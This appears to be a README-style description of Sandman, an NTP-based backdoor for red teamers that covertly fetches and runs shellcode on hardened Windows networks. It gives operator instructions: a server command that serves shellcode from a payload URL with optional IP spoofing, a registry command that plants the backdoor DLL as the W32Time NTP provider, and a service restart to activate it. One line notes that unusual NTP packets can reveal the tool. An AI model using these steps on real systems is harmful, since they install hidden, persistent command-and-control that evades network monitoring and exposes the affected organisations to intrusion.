Sandman is an NTP-based backdoor designed to stealthily deliver and execute arbitrary shellcode on hardened networks during red team engagements.
Sandman is a NTP based backdoor for hardened networks.
This tool is primarily used by penetration testers and red teamers to bypass network defenses by leveraging the often-overlooked NTP protocol to fetch and execute payloads. It enables covert command and control in environments where traditional communication channels are heavily restricted or monitored.
Ensure the backdoor is compiled with the x64 option to avoid compatibility issues. Use IP spoofing carefully to avoid detection and network conflicts. Since NTP traffic is generally allowed through firewalls, monitoring for unusual NTP packets or magic headers can help detect Sandman activity. Contributions and improvements are welcomed via pull requests.
Install Python 3.9 for SandmanServer
Install Python dependencies listed in SandmanServer/requirements.txt
Compile SandmanBackdoor using Visual Studio 2022 or CSC with x64 configuration
Optionally compile SandmanBackdoorTimeProvider with Visual Studio 2022 and DllExport installed
Add registry key to configure SandmanBackdoorTimeProvider as an NTP client DLL
Restart Windows w32time service after registry modificationpython3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Starts the Sandman server listening on the specified network adapter, serving shellcode payloads from the given URL, optionally spoofing a legitimate IP address.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
Registers the SandmanBackdoorTimeProvider DLL as an NTP client provider in Windows.
sc stop w32time && sc start w32time
Restarts the Windows time service to apply the new NTP provider configuration.